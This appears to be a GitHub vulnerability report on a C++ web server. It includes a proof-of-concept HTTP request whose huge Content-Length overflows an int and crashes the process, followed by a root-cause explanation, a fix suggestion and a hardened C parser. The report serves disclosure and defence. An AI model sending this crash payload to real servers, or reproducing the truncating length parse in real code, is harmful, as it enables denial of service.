Closed ek1ng closed 1 year ago
POC

Send the following HTTP request to the server:

```http
POST / HTTP/1.1
Host: 127.0.0.1:9006
User-Agent: curl/7.68.0
Accept: */*
Content-Length:0221202434513

..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
```

The process crashes.
Vulnerability principle

In http_conn.h:

```cpp
int m_content_length;
```

Here m_content_length is defined as an int.

In http_conn.cpp:

```cpp
m_content_length = atol(text);
```
When the value in the Content-Length request header is fairly large, m_content_length is read in as a long and then converted to an int. For example, the 0221202434513 in the payload above has the hexadecimal value 0x3380b149d1; after conversion to int it is truncated to 8 hex digits, 0x80b149d1, which is a negative number.

In http_conn.cpp:
```cpp
http_conn::HTTP_CODE http_conn::parse_content(char *text)
{
    if (m_read_idx >= (m_content_length + m_checked_idx))
    {
        text[m_content_length] = '\0';
        // the end of the POST request is the username and password that were entered
        m_string = text;
        return GET_REQUEST;
    }
    return NO_REQUEST;
}
```
In text[m_content_length] = '\0'; m_content_length is a fairly large negative number that exceeds the size of the heap, and when an address without access permission is touched the process crashes.
Suggested fix

In http_conn.h, change m_read_idx, m_content_length and m_checked_idx to long.
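The following is an added example, not code from the reported project: it reproduces the long-to-int truncation described above with the exact header value from the POC, shows that the `m_read_idx >= m_content_length + m_checked_idx` check is satisfied by the resulting negative length, and places a hardened Content-Length parser next to it that rejects anything that is not a plain digit string, overflows, or does not fit in the read buffer. The buffer size `READ_BUFFER_SIZE` (2048) and the helper names are assumptions for the example and are not taken from the project.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the per-connection read buffer; stands in for the server's own
 * READ_BUFFER_SIZE and is not taken from the project. */
#define READ_BUFFER_SIZE 2048

/* Vulnerable pattern from the report: atol() returns long, the assignment to int
 * silently keeps only the low 32 bits (on LP64 with GCC/Clang). */
int content_length_truncating(const char *text)
{
    int m_content_length = atol(text);
    return m_content_length;
}

/* The comparison parse_content() makes before writing text[m_content_length] = '\0'.
 * With a negative length the comparison succeeds, so the write would land at a huge
 * negative offset from the body pointer. Nothing is written here. */
bool vulnerable_check_passes(int m_read_idx, int m_checked_idx, const char *text)
{
    int m_content_length = content_length_truncating(text);
    return m_read_idx >= m_content_length + m_checked_idx;
}

/* Hardened parser: Content-Length must be a plain digit string (RFC 9110 1*DIGIT),
 * must not overflow, and the body must fit in the buffer after the headers with
 * room for the terminating '\0'. Returns true and stores the length on success. */
bool parse_content_length_checked(const char *text, size_t checked_idx, size_t *out)
{
    if (text == NULL || *text == '\0')
        return false;
    for (const char *p = text; *p != '\0'; p++)
        if (*p < '0' || *p > '9')
            return false;           /* rejects "-5", " 42", "0x10", trailing junk */
    errno = 0;
    char *end = NULL;
    unsigned long long v = strtoull(text, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return false;               /* value does not fit in unsigned long long */
    if (checked_idx >= READ_BUFFER_SIZE - 1)
        return false;               /* headers already consumed the buffer */
    if (v > (unsigned long long)(READ_BUFFER_SIZE - 1 - checked_idx))
        return false;               /* body would not fit: reject, never index */
    *out = (size_t)v;
    return true;
}

/* Convenience wrapper: parsed length, or -1 when the header is rejected. */
long long checked_length_or_minus1(const char *text, size_t checked_idx)
{
    size_t v = 0;
    return parse_content_length_checked(text, checked_idx, &v) ? (long long)v : -1;
}

/* Hardened replacement for the parse_content() step. Returns 1 when the whole body
 * is present and has been terminated, 0 when more data is needed, -1 when the
 * Content-Length header is rejected. Uses a local buffer so it runs stand-alone. */
int parse_content_checked(size_t read_idx, size_t checked_idx, const char *len_hdr)
{
    char m_read_buf[READ_BUFFER_SIZE];
    memset(m_read_buf, '.', sizeof m_read_buf);      /* constructed body filler */
    size_t m_content_length = 0;
    if (!parse_content_length_checked(len_hdr, checked_idx, &m_content_length))
        return -1;
    if (read_idx >= m_content_length + checked_idx) {
        char *text = m_read_buf + checked_idx;       /* body starts after the headers */
        text[m_content_length] = '\0';               /* index <= READ_BUFFER_SIZE - 1 */
        return 1;
    }
    return 0;
}

int main(void)
{
    const char *len = "0221202434513";               /* value from the report's POC */
    printf("atol -> int: %d\n", content_length_truncating(len));
    printf("vulnerable check passes: %d\n", vulnerable_check_passes(1500, 100, len));
    printf("checked parse: %lld\n", checked_length_or_minus1(len, 100));
    printf("checked parse_content with Content-Length: 42 -> %d\n",
           parse_content_checked(1500, 100, "42"));
    return 0;
}
```

Widening the fields to long, as suggested above, removes the truncation on LP64 targets, but on a 32-bit ABI long is also 32 bits and atol() saturates at LONG_MAX, so the parser still has to reject any Content-Length that is larger than the space left in the read buffer before it is ever used as an index; the checked parser above does that regardless of integer width.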
Does this situation only occur in the scenario where the message content is too long?